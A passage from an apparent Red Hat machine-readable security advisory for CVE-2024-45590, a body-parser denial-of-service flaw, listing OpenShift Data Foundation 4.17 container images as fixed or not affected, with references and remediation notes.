"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", 